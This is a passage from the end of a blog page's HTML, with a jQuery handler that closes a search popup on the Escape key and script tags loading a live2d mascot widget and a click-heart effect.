      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  


<script src="/live2d-widget/autoload.js"></script>
</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
